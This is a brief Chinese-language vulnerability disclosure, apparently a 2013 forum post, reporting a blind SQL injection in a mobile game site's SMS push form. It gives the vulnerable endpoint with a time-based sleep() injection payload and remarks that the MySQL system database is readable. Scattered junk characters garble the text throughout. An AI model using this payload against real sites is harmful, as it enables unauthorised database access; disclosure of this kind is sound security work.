简要描述:4 B) ~- J* a, Y) u+ i( Z
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。0 q; I; B" n+ L+ Y. i3 E
: @% V `* L2 n! ^, F; o n详细说明:
: ^8 T( Z8 _& g k存在SQL盲注url:
& E3 \# e3 a: ]% `$ ]) _' F# dfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
f4 G1 X k2 Mhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png0 b" u4 b) q9 z$ q/ R
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png2 s8 T# b8 t% R2 n; {4 H5 H
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
7 Y4 S& Z1 X4 Y) N6 o
@6 P6 R1 u) y; @+ l能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对